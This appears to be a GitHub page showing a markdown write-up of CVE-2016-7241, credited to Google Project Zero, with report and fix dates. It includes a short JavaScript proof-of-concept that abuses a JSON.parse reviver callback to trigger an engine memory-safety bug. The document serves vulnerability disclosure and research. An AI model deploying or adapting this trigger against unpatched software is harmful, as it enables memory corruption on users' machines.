Skip to content

Latest commit

 

History

History
28 lines (21 loc) · 466 Bytes

CVE-2016-7241.md

File metadata and controls

28 lines (21 loc) · 466 Bytes
Raw

CVE-2016-7241

  • Report: Dec 2016
  • Fix: Oct 2016
  • Credit: Natalie Silvanovich, Google Project Zero

PoC

var once = false;
var a = 1;

function f(){
  if(!once){
    a = new Array(1, 2, 3);
    this[2] = a;
  }
  once = true;
  return {};
}

JSON.parse("[1, 2, [4, 5]]", f);

Reference